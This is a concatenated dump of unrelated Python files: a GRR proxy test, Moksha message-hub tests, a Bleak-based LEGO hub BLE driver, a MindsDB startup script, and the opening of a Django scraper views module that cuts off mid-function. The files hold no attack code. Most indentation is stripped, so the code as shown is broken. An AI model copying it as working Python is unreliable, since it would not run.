address_family = socket.AF_INET6
class ApiSslProxyTest(ApiSslServerTestBase):
def setUp(self):
super(ApiSslProxyTest, self).setUp()
attempts_count = 0
self.proxy_server = None
while self.proxy_server is None:
try:
self.proxy_port = portpicker.pick_unused_port()
self.proxy_server = TCPServerV6(("::", self.proxy_port), Proxy)
except socket.error:
attempts_count += 1
if attempts_count == 10:
self.fail("Can't initialize proxy server.")
threading.Thread(target=self.proxy_server.serve_forever).start()
self.addCleanup(self.proxy_server.server_close)
self.addCleanup(self.proxy_server.shutdown)
def testProxyConnection(self):
client_id = self.SetupClient(0)
api = grr_api.InitHttp(
api_endpoint=self.endpoint,
proxies={"https": "localhost:%d" % self.proxy_port})
with self.assertRaises(requests.exceptions.ConnectionError):
api.Client(client_id=client_id).Get()
# CONNECT request should point to GRR SSL server.
self.assertEqual(Proxy.requests,
["CONNECT localhost:%d HTTP/1.0" % self.port])
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
test_hub.py
|
# This file is part of Moksha.
# Copyright (C) 2008-2010 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Moksha's Hub """
import threading
import moksha
try:
import unittest2 as unittest
except ImportError:
import unittest
from time import sleep, time
from uuid import uuid4
from kitchen.iterutils import iterate
import tempfile
import shutil
import os
import stat
import zmq
import json
import moksha.common.testtools.utils as testutils
import moksha.hub.api
from moksha.hub.hub import MokshaHub, CentralMokshaHub
from moksha.hub.reactor import reactor as _reactor
from moksha.hub.monitoring import MonitoringProducer
from nose.tools import (eq_, assert_true, assert_false)
# Some constants used throughout the hub tests
sleep_duration = 0.25
secret = "secret_message"
def simulate_reactor(duration=sleep_duration):
""" Simulate running the reactor for `duration` milliseconds """
global _reactor
start = time()
while time() - start < duration:
_reactor.doPoll(0.0001)
_reactor.runUntilCurrent()
class TestHub:
def _setUp(self):
def kernel(config):
self.hub = MokshaHub(config=config)
self.topic = str(uuid4())
for __setup, name in testutils.make_setup_functions(kernel):
yield __setup, name
def _tearDown(self):
self.hub.close()
@testutils.crosstest
def test_hub_creation(self):
""" Test that we can simply create the hub. """
assert_true(self.hub)
eq_(self.hub.topics, {})
@testutils.crosstest
def test_hub_send_recv(self):
"Test that we can send a message and receive it."
messages_received = []
def callback(json):
messages_received.append(json.body[1:-1])
self.hub.subscribe(topic=self.topic, callback=callback)
sleep(sleep_duration)
self.hub.send_message(topic=self.topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret])
@testutils.crosstest
def test_hub_no_subscription(self):
"Test that we don't receive messages we're not subscribed for."
messages_received = []
def callback(json):
messages_received.append(json.body[1:-1])
self.hub.send_message(topic=self.topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [])
class TestConsumer:
def _setUp(self):
def kernel(config):
self.hub = MokshaHub(config=config)
self.a_topic = str(uuid4())
for __setup, name in testutils.make_setup_functions(kernel):
yield __setup, name
def _tearDown(self):
self.hub.close()
def fake_register_consumer(self, cons):
""" Fake register a consumer, not by entry-point like usual.
Normally, consumers are identified by the hub by way of entry-points
Ideally, this test would register the TestConsumer on the
moksha.consumers entry point, and the hub would pick it up.
I'm not sure how to do that, so we're going to fake it and manually
add this consumer to the list of consumers of which the Hub is aware.
"""
consumer = cons(self.hub)
consume = consumer.consume
for topic in iterate(cons.topic):
self.hub.topics[topic] = self.hub.topics.get(topic, [])
if consume not in self.hub.topics[topic]:
print('registering fake topic %r' % topic)
self.hub.topics[topic].append(consume)
sleep(sleep_duration)
return consumer
@testutils.crosstest
def test_abstract(self):
""" Ensure that conumsers with no consume method raise exceptions. """
class StillAbstractConsumer(moksha.hub.api.consumer.Consumer):
pass
try:
c = StillAbstractConsumer(self.hub)
c.consume("foo")
assert(False)
except NotImplementedError:
pass
@testutils.crosstest
def test_receive_without_json(self):
""" Try sending/receiving messages without jsonifying. """
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
jsonify = False
topic = self.a_topic
def _consume(self, message):
messages_received.append(message)
self.fake_register_consumer(TestConsumer)
# Now, send a generic message to that topic, and see if we get one.
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(len(messages_received), 1)
@testutils.crosstest
def test_receive_str(self):
""" Send a message Consume and verify it. """
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer)
# Now, send a generic message to that topic, and see if the consumer
# processed it.
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret])
@testutils.crosstest
def test_receive_str_double(self):
""" Send a message. Have two consumers consume it. """
messages_received = []
class TestConsumer1(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
class TestConsumer2(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer1)
self.fake_register_consumer(TestConsumer2)
# Now, send a generic message to that topic, and see if the consumer
# processed it.
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret, secret])
@testutils.crosstest
def test_receive_str_near_miss(self):
""" Send a message. Three consumers. Only one receives. """
messages_received = []
class BaseConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
class Consumer1(BaseConsumer):
pass
class Consumer2(BaseConsumer):
topic = BaseConsumer.topic[:-1]
class Consumer3(BaseConsumer):
topic = BaseConsumer.topic + "X"
self.fake_register_consumer(Consumer1)
self.fake_register_consumer(Consumer2)
self.fake_register_consumer(Consumer3)
# Now, send a generic message to that topic, and see if Consumer1
# processed it but that Consumer2 and Consumer3 didn't
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret])
@testutils.crosstest
def test_receive_dict(self):
""" Send a dict with a message. Consume, extract, and verify it. """
obj = {'secret': secret}
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
obj = message['body']
messages_received.append(obj['secret'])
self.fake_register_consumer(TestConsumer)
# Now, send a generic message to that topic, and see if the consumer
# processed it.
self.hub.send_message(topic=self.a_topic, message=obj)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(messages_received, [secret])
@testutils.crosstest
def test_receive_n_messages(self):
""" Send `n` messages, receive `n` messages. """
n_messages = 10
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer)
# Now, send n messages and make sure that n messages were consumed.
for i in range(n_messages):
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(len(messages_received), n_messages)
@testutils.crosstest
def test_receive_n_dicts(self):
""" Send `n` dicts, receive `n` dicts. """
n_messages = 10
obj = {'secret': secret}
messages_received = []
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer)
# Now, send n objects and make sure that n objects were consumed.
for i in range(n_messages):
self.hub.send_message(topic=self.a_topic, message=obj)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(len(messages_received), n_messages)
@testutils.crosstest
def test_multiple_topics(self):
""" Send a message to multiple topics. """
n_messages = 2
obj = {'secret': secret}
messages_received = []
b_topic = str(uuid4())
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = [self.a_topic, b_topic]
def _consume(self, message):
messages_received.append(message['body'])
self.fake_register_consumer(TestConsumer)
self.hub.send_message(topic=self.a_topic, message=obj)
self.hub.send_message(topic=b_topic, message=obj)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(len(messages_received), n_messages)
@testutils.crosstest
def test_dynamic_topic(self):
""" Test that a topic can be set at runtime (not import time) """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = "bad topic"
def __init__(self, *args, **kw):
super(TestConsumer, self).__init__(*args, **kw)
self.topic = "good topic"
def _consume(self, message):
pass
# Just a little fake config.
config = dict(
zmq_enabled=True,
zmq_subscribe_endpoints='',
zmq_published_endpoints='',
)
central = CentralMokshaHub(config, [TestConsumer], [])
# Guarantee that "bad topic" is not in the topics list.
eq_(list(central.topics.keys()), ["good topic"])
@testutils.crosstest
def test_open_and_close(self):
""" Test that a central hub with a consumer can be closed.. ;) """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = "whatever"
def _consume(self, message):
pass
# Just a little fake config.
config = dict(
zmq_enabled=True,
zmq_subscribe_endpoints='',
zmq_published_endpoints='',
)
central = CentralMokshaHub(config, [TestConsumer], [])
central.close()
@testutils.crosstest
def test_consumer_stats_queued(self):
""" Verify that message processing stats are set for queued messages. """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def consume(self, message):
pass
cons = self.fake_register_consumer(TestConsumer)
for i in range(5):
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(cons.headcount_in, 5)
eq_(cons.headcount_out, 0)
eq_(cons._exception_count, 0)
eq_(len(cons._times), 0)
@testutils.crosstest
def test_consumer_stats_processed(self):
""" Verify that message processing stats are set for processed messages. """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def consume(self, message):
pass
self.hub.config['moksha.blocking_mode'] = True
cons = self.fake_register_consumer(TestConsumer)
for i in range(5):
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(cons.headcount_in, 5)
eq_(cons.headcount_out, 5)
eq_(cons._exception_count, 0)
eq_(len(cons._times), 5)
@testutils.crosstest
def test_consumer_stats_exceptions(self):
""" Verify that message processing stats are set for messages that generate exceptions. """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def consume(self, message):
if message['body'] % 2:
raise RuntimeError()
self.hub.config['moksha.blocking_mode'] = True
cons = self.fake_register_consumer(TestConsumer)
for i in range(5):
self.hub.send_message(topic=self.a_topic, message=i)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(cons.headcount_in, 5)
eq_(cons.headcount_out, 5)
eq_(cons._exception_count, 2)
eq_(len(cons._times), 5)
@testutils.crosstest
def test_consumer_stats_overflow(self):
""" Verify that Consumer._times doesn't grow beyond a maximum size. """
class TestConsumer(moksha.hub.api.consumer.Consumer):
topic = self.a_topic
def consume(self, message):
pass
self.hub.config['moksha.blocking_mode'] = True
cons = self.fake_register_consumer(TestConsumer)
for i in range(1500):
self.hub.send_message(topic=self.a_topic, message=secret)
simulate_reactor(sleep_duration)
sleep(sleep_duration)
eq_(cons.headcount_in, 1500)
eq_(cons.headcount_out, 1500)
eq_(cons._exception_count, 0)
eq_(len(cons._times), 1024)
class TestProducer:
def _setUp(self):
def kernel(config):
self.hub = MokshaHub(config=config)
self.a_topic = a_topic = str(uuid4())
for __setup, name in testutils.make_setup_functions(kernel):
yield __setup, name
def _tearDown(self):
self.hub.close()
def fake_register_producer(self, prod):
""" Fake register a producer, not by entry-point like usual.
Registering producers is a little easier than registering consumers.
The MokshaHub doesn't even keep track of the .poll method callbacks.
We simply instantiate the producer (and it registers itself with the
hub).
"""
return prod(self.hub)
@testutils.crosstest
def test_produce_ten_strs(self):
""" Produce ten-ish strings. """
messages_received = []
class TestProducer(moksha.hub.api.producer.PollingProducer):
topic = self.a_topic
frequency = sleep_duration / 10.9
called = 0
def poll(self):
self.called = self.called + 1
# Ready?
prod = self.fake_register_producer(TestProducer)
def killer():
sleep(sleep_duration)
prod.die = True
threading.Thread(target=killer).start()
prod._work()
        # Finally, the check. Did we get our ten messages? (or about as many)
assert prod.called > 8
assert prod.called < 12
@testutils.crosstest
def test_idempotence(self):
""" Test that running the same test twice still works. """
return self.test_produce_ten_strs()
class TestMonitoring:
def _setUp(self):
def kernel(config):
self.hub = CentralMokshaHub(config=config)
self.a_topic = a_topic = str(uuid4())
for __setup, name in testutils.make_setup_functions(kernel):
yield __setup, name
def _tearDown(self):
self.hub.close()
@testutils.crosstest
def test_monitoring(self):
""" Test that the MonitoringProducer works as expected. """
tmpdir = tempfile.mkdtemp()
try:
zmq_file = tmpdir + '/socket'
zmq_socket = 'ipc://' + zmq_file
self.hub.config['moksha.monitoring.socket'] = zmq_socket
self.hub.config['moksha.monitoring.socket.mode'] = '777'
mon = MonitoringProducer(self.hub)
assert_true(os.path.exists(zmq_file))
assert_true(stat.S_IMODE(os.stat(zmq_file).st_mode) == 0o777)
ctx = zmq.Context()
sub = ctx.socket(zmq.SUB)
sub.setsockopt(zmq.RCVTIMEO, 10000)
sub.setsockopt_string(zmq.SUBSCRIBE, u'')
sub.connect(zmq_socket)
data = []
def recv():
data.append(sub.recv())
thread = threading.Thread(target=recv)
thread.start()
sleep(sleep_duration)
mon.poll()
thread.join()
eq_(len(data), 1)
d = json.loads(data[0])
eq_(len(d['consumers']), 0)
eq_(len(d['producers']), 1)
eq_(d['producers'][0]['name'], 'MonitoringProducer')
finally:
shutil.rmtree(tmpdir)
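# For reference, the monitoring payload decoded in the test above has roughly
# this shape (inferred from the assertions; exact fields may vary by version):
#   {"consumers": [], "producers": [{"name": "MonitoringProducer", ...}]}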
|
cbleak.py
|
import asyncio
import logging
import platform
import queue
import threading
import time
import bleak
from pylgbst.comms import Connection, MOVE_HUB_HW_UUID_CHAR, MOVE_HUB_HW_UUID_SERV
log = logging.getLogger('comms-bleak')
class BleakDriver:
"""Driver that provides interface between API and Bleak."""
def __init__(self, hub_mac=None, hub_name=None):
"""
        Initialize a new object of the BleakDriver class.
        :param hub_mac: Optional Lego HUB MAC to connect to.
        :param hub_name: Optional Lego HUB name to connect to.
"""
self.hub_mac = hub_mac
self.hub_name = hub_name
self._handler = None
self._abort = False
self._connection_thread = None
self._processing_thread = None
# Queues to handle request / responses. Acts as a buffer between API and async BLE driver
self.resp_queue = queue.Queue()
self.req_queue = queue.Queue()
def set_notify_handler(self, handler):
"""
        Set the handler function used to communicate with the API.
        :param handler: Handler function called by the driver when data is received
:return: None
"""
self._handler = handler
def enable_notifications(self):
"""
        Enable notifications; in our case this starts the communication threads.
        We cannot do this earlier, because the API needs to set the notification handler first.
:return: None
"""
self._connection_thread = threading.Thread(target=lambda: asyncio.run(self._bleak_thread()))
self._connection_thread.daemon = True
self._connection_thread.start()
self._processing_thread = threading.Thread(target=self._processing)
self._processing_thread.daemon = True
self._processing_thread.start()
async def _bleak_thread(self):
        connection = BleakConnection()  # renamed from 'bleak' to stop shadowing the imported module
        # For macOS 12+ the service_uuids kwarg is required for scanning
        kwargs = {}  # must be a dict, since it is unconditionally unpacked below
        if "Darwin" == platform.system() and int(platform.mac_ver()[0].split(".")[0]) >= 12:
            kwargs = {"service_uuids": [MOVE_HUB_HW_UUID_SERV]}
        await connection.connect(self.hub_mac, self.hub_name, **kwargs)
        await connection.set_notify_handler((self._safe_handler, self.resp_queue))
        # After connecting we need to send some data or the hub will drop the connection;
        # the command below is an Advertising Name request update
        await connection.write_char(MOVE_HUB_HW_UUID_CHAR, bytearray([0x05, 0x00, 0x01, 0x01, 0x05]))
        while not self._abort:
            await asyncio.sleep(0.1)
            if self.req_queue.qsize() != 0:
                data = self.req_queue.get()
                await connection.write(data[0], data[1])
        log.info("Communications thread has exited")
@staticmethod
def _safe_handler(handler, data, resp_queue):
resp_queue.put((handler, data))
def _processing(self):
while not self._abort:
if self.resp_queue.qsize() != 0:
msg = self.resp_queue.get()
self._handler(msg[0], bytes(msg[1]))
time.sleep(0.01)
logging.info("Processing thread has exited")
def write(self, handle, data):
"""
Send data to given handle number.
:param handle: Handle number that will be translated into characteristic uuid
:param data: data to send
:raises ConnectionError" When internal threads are not working
:return: None
"""
if not self._connection_thread.is_alive() or not self._processing_thread.is_alive():
raise ConnectionError('Something went wrong, communication threads not functioning.')
self.req_queue.put((handle, data))
def disconnect(self):
"""
        Disconnect and stop the communication threads.
:return: None
"""
self._abort = True
def is_alive(self):
"""
Indicate whether driver is functioning or not.
:return: True if driver is functioning; False otherwise.
"""
if self._connection_thread is not None and self._processing_thread is not None:
return self._connection_thread.is_alive() and self._processing_thread.is_alive()
else:
return False
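# Data flow summary for BleakDriver, as implemented above (inferred from the
# code, not from upstream documentation):
#   API thread --write()--> req_queue --asyncio thread--> BleakConnection.write()
#   BLE notify --_safe_handler--> resp_queue --processing thread--> self._handler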
class BleakConnection(Connection):
"""Bleak driver for communicating with BLE device."""
def __init__(self):
"""Initialize new instance of BleakConnection class."""
Connection.__init__(self)
self._device = None
self._client = None
logging.getLogger('bleak.backends.dotnet.client').setLevel(logging.WARNING)
logging.getLogger('bleak.backends.bluezdbus.client').setLevel(logging.WARNING)
async def connect(self, hub_mac=None, hub_name=None, **kwargs):
"""
Connect to device.
:param hub_mac: Optional Lego HUB MAC to connect to
:param hub_name: Optional Lego Hub name to connect to
        :param kwargs: Optional parameters for bleak.discover
        :raises ConnectionError: When no device matching the given MAC or name can be found.
:return: None
"""
log.info("Discovering devices... Press green button on Hub")
for i in range(0, 30):
devices = await bleak.discover(timeout=1, **kwargs)
log.debug("Devices: %s", devices)
for dev in devices:
log.debug(dev)
address = dev.address
name = dev.name
if self._is_device_matched(address, name, hub_mac, hub_name):
log.info('Device matched: %r', dev)
self._device = dev
break
else:
continue
break
else:
raise ConnectionError('Device not found.')
self._client = bleak.BleakClient(self._device)
status = await self._client.connect()
log.debug('Connection status: {status}'.format(status=status))
async def write(self, handle, data):
"""
        Send data to the given handle number.
        If the handle cannot be found in the service description, the hardcoded LEGO UUID will be used.
:param handle: Handle number that will be translated into characteristic uuid
:param data: data to send
:return: None
"""
log.debug('Request: {handle} {payload}'.format(handle=handle, payload=[hex(x) for x in data]))
desc = self._client.services.get_descriptor(handle)
if not isinstance(data, bytearray):
data = bytearray(data)
if desc is None:
# dedicated handle not found, try to send by using LEGO Move Hub default characteristic
await self._client.write_gatt_char(MOVE_HUB_HW_UUID_CHAR, data)
else:
await self._client.write_gatt_char(desc.characteristic_uuid, data)
async def write_char(self, characteristic_uuid, data):
"""
        Send data to the given characteristic UUID.
:param characteristic_uuid: Characteristic uuid used to send data
:param data: data to send
:return: None
"""
await self._client.write_gatt_char(characteristic_uuid, data)
async def set_notify_handler(self, inputs):
"""
        Set the notification handler.
        :param inputs: Tuple of (handler, resp_queue); the handler is called whenever data is received.
:return: None
"""
handler, resp_queue = inputs
def c(handle, data):
log.debug('Response: {handle} {payload}'.format(handle=handle, payload=[hex(x) for x in data]))
handler(handle, data, resp_queue)
await self._client.start_notify(MOVE_HUB_HW_UUID_CHAR, c)
def is_alive(self):
"""
To keep compatibility with the driver interface.
This method does nothing.
:return: None.
"""
pass
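# Minimal usage sketch of BleakDriver (illustrative only). The MAC address and
# the five-second run time below are placeholder assumptions; the write payload
# is the same Advertising Name request the driver itself sends after connecting.
if __name__ == '__main__':
    def print_handler(handle, data):
        # Runs on the processing thread for every BLE notification.
        print('notification:', handle, data)

    driver = BleakDriver(hub_mac='00:11:22:33:44:55')
    driver.set_notify_handler(print_handler)
    driver.enable_notifications()  # spawns the asyncio and processing threads
    try:
        # Writes are queued here and flushed by the asyncio thread.
        driver.write(MOVE_HUB_HW_UUID_CHAR, bytearray([0x05, 0x00, 0x01, 0x01, 0x05]))
        time.sleep(5)  # let notifications arrive
    finally:
        driver.disconnect()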
|
__main__.py
|
import atexit
import traceback
import sys
import os
import time
import asyncio
import signal
import psutil
import torch.multiprocessing as mp
from packaging import version
from mindsdb.api.http.start import start as start_http
from mindsdb.api.mysql.start import start as start_mysql
from mindsdb.api.mongo.start import start as start_mongo
from mindsdb.utilities.config import Config, STOP_THREADS_EVENT
from mindsdb.utilities.ps import is_pid_listen_port, get_child_pids
from mindsdb.utilities.functions import args_parse, get_versions_where_predictors_become_obsolete
from mindsdb.utilities.with_kwargs_wrapper import WithKWArgsWrapper
from mindsdb.utilities.log import log
from mindsdb.interfaces.database.database import DatabaseWrapper
from mindsdb.interfaces.model.model_interface import ray_based, ModelInterface
import mindsdb.interfaces.storage.db as db
COMPANY_ID = os.environ.get('MINDSDB_COMPANY_ID', None)
def close_api_gracefully(apis):
try:
for api in apis.values():
process = api['process']
childs = get_child_pids(process.pid)
for p in childs:
try:
os.kill(p, signal.SIGTERM)
except Exception:
p.kill()
sys.stdout.flush()
process.terminate()
process.join()
sys.stdout.flush()
if ray_based:
os.system('ray stop --force')
except KeyboardInterrupt:
sys.exit(0)
except psutil.NoSuchProcess:
pass
if __name__ == '__main__':
mp.freeze_support()
args = args_parse()
config = Config()
is_cloud = config.get('cloud', False)
if not is_cloud:
print('Applying database migrations:')
try:
from mindsdb.migrations import migrate
migrate.migrate_to_head()
except Exception as e:
print(f'Error! Something went wrong during DB migrations: {e}')
if args.verbose is True:
# Figure this one out later
pass
os.environ['DEFAULT_LOG_LEVEL'] = config['log']['level']['console']
os.environ['LIGHTWOOD_LOG_LEVEL'] = config['log']['level']['console']
    # Switch to this once the native interface has its own thread :/
ctx = mp.get_context('spawn')
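    # ('spawn' starts each API child from a fresh interpreter instead of fork(),
    # so children do not inherit this process's threads and locks; it requires
    # the start targets such as start_http to be importable at module level.)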
from mindsdb.__about__ import __version__ as mindsdb_version
print(f'Version {mindsdb_version}')
print(f'Configuration file:\n {config.config_path}')
print(f"Storage path:\n {config['paths']['root']}")
    # @TODO Backwards compatibility for tests, remove later
from mindsdb.interfaces.database.integrations import DatasourceController
dbw = DatabaseWrapper(COMPANY_ID)
model_interface = WithKWArgsWrapper(ModelInterface(), company_id=COMPANY_ID)
datasource_interface = WithKWArgsWrapper(DatasourceController(), company_id=COMPANY_ID)
raw_model_data_arr = model_interface.get_models()
model_data_arr = []
for model in raw_model_data_arr:
if model['status'] == 'complete':
try:
model_data_arr.append(model_interface.get_model_data(model['name']))
except Exception:
pass
if not is_cloud:
# region Mark old predictors as outdated
is_modified = False
predictor_records = db.session.query(db.Predictor).all()
if len(predictor_records) > 0:
            success, compatible_versions = get_versions_where_predictors_become_obsolete()
            if success is True:
compatible_versions = [version.parse(x) for x in compatible_versions]
mindsdb_version_parsed = version.parse(mindsdb_version)
compatible_versions = [x for x in compatible_versions if x <= mindsdb_version_parsed]
if len(compatible_versions) > 0:
last_compatible_version = compatible_versions[-1]
for predictor_record in predictor_records:
if (
                            isinstance(predictor_record.mindsdb_version, str)
and version.parse(predictor_record.mindsdb_version) < last_compatible_version
):
predictor_record.update_status = 'available'
is_modified = True
if is_modified is True:
db.session.commit()
# endregion
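        # (packaging.version gives PEP 440-aware ordering, which is why plain
        # string comparison would be wrong above, e.g.:
        #   version.parse('2.10.0') > version.parse('2.9.1')  # True, although '2.10.0' < '2.9.1' as strings
        # )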
for integration_name in datasource_interface.get_db_integrations(sensitive_info=True):
print(f"Setting up integration: {integration_name}")
if datasource_interface.get_db_integration(integration_name).get('publish', False):
# do setup and register only if it is 'publish' integration
dbw.setup_integration(integration_name)
dbw.register_predictors(model_data_arr, integration_name=integration_name)
for integration_name in config.get('integrations', {}):
try:
it = datasource_interface.get_db_integration(integration_name)
if it is not None:
datasource_interface.remove_db_integration(integration_name)
print(f'Adding: {integration_name}')
datasource_interface.add_db_integration(integration_name, config['integrations'][integration_name]) # Setup for user `None`, since we don't need this for cloud
if config['integrations'][integration_name].get('publish', False) and not is_cloud:
dbw.setup_integration(integration_name)
dbw.register_predictors(model_data_arr, integration_name=integration_name)
except Exception as e:
log.error(f'\n\nError: {e} adding database integration {integration_name}\n\n')
del model_interface
del dbw
    # @TODO Backwards compatibility for tests, remove later
if args.api is None:
api_arr = ['http', 'mysql']
else:
api_arr = args.api.split(',')
apis = {
api: {
'port': config['api'][api]['port'],
'process': None,
'started': False
} for api in api_arr
}
start_functions = {
'http': start_http,
'mysql': start_mysql,
'mongodb': start_mongo
}
for api_name, api_data in apis.items():
if api_data['started']:
continue
print(f'{api_name} API: starting...')
try:
if api_name == 'http':
p = ctx.Process(target=start_functions[api_name], args=(args.verbose, args.no_studio))
else:
p = ctx.Process(target=start_functions[api_name], args=(args.verbose,))
p.start()
api_data['process'] = p
except Exception as e:
log.error(f'Failed to start {api_name} API with exception {e}\n{traceback.format_exc()}')
close_api_gracefully(apis)
raise e
atexit.register(close_api_gracefully, apis=apis)
async def wait_api_start(api_name, pid, port):
timeout = 60
start_time = time.time()
started = is_pid_listen_port(pid, port)
while (time.time() - start_time) < timeout and started is False:
await asyncio.sleep(0.5)
started = is_pid_listen_port(pid, port)
return api_name, port, started
async def wait_apis_start():
futures = [
wait_api_start(api_name, api_data['process'].pid, api_data['port'])
for api_name, api_data in apis.items() if 'port' in api_data
]
for i, future in enumerate(asyncio.as_completed(futures)):
api_name, port, started = await future
if started:
print(f"{api_name} API: started on {port}")
else:
log.error(f"ERROR: {api_name} API cant start on {port}")
ioloop = asyncio.get_event_loop()
ioloop.run_until_complete(wait_apis_start())
ioloop.close()
try:
for api_data in apis.values():
api_data['process'].join()
except KeyboardInterrupt:
print('Stopping stream integrations...')
STOP_THREADS_EVENT.set()
print('Closing app...')
|
views.py
|
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.contrib.auth import update_session_auth_hash
from .forms import CreateProject, DeleteProject, ItemName, FieldName, CreatePipeline, LinkGenerator, Scraper, Settings, ShareDB, ChangePass, ShareProject
from django.http import HttpResponseRedirect
from django.http import HttpResponse, HttpResponseNotFound, JsonResponse
from .models import Project, Item, Pipeline, Field, LinkgenDeploy, ScrapersDeploy, Dataset
from django.forms.util import ErrorList
from itertools import groupby
from django.core.urlresolvers import reverse
import os
import shutil
from string import Template
from .scrapy_packages import settings
from pymongo import MongoClient
import glob
import subprocess
import requests
import json
import datetime
import dateutil.parser
import socket
from django.contrib.auth.models import User
from bson.json_util import dumps
import threading
import crypt
try:
# Python 3
from urllib.parse import urlparse
except ImportError:
# Python 2
from urlparse import urlparse
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
def generate_default_settings():
settings = """# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'unknown'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'"""
return settings
@login_required
def main_page(request):
projects = Project.objects.filter(user=request.user)
datasets = Dataset.objects.filter(user=request.user)
userprojects = []
databases = []
for project in projects:
singleproject = {}
singleproject['name'] = project.project_name
userprojects.append(singleproject)
for dataset in datasets:
databases.append(dataset.database)
return render(request, template_name="mainpage.html",
context={'username': request.user.username, 'projects': userprojects, 'databases': databases})
@login_required
def create_new(request):
if request.method == 'GET':
form = CreateProject()
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = CreateProject(request.POST)
if form.is_valid():
                allprojects = []
userprojects = Project.objects.filter(user=request.user)
for project in userprojects:
allprojects.append(project.project_name)
if form.cleaned_data['projectname'] in allprojects:
errors = form._errors.setdefault("projectname", ErrorList())
errors.append('Project named %s already exists. Please choose another name' % form.cleaned_data['projectname'])
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
else:
project = Project()
project.project_name = form.cleaned_data['projectname']
project.user = request.user
project.settings_scraper = generate_default_settings()
project.settings_link_generator = generate_default_settings()
project.scraper_function = '''def parse(self, response):\n pass'''
project.link_generator = '''start_urls = [""]\ndef parse(self, response):\n pass'''
project.save()
# project data will be saved in username_projectname database, so we need to
# give the current user ownership of that database
mongodbname = request.user.username + "_" + project.project_name
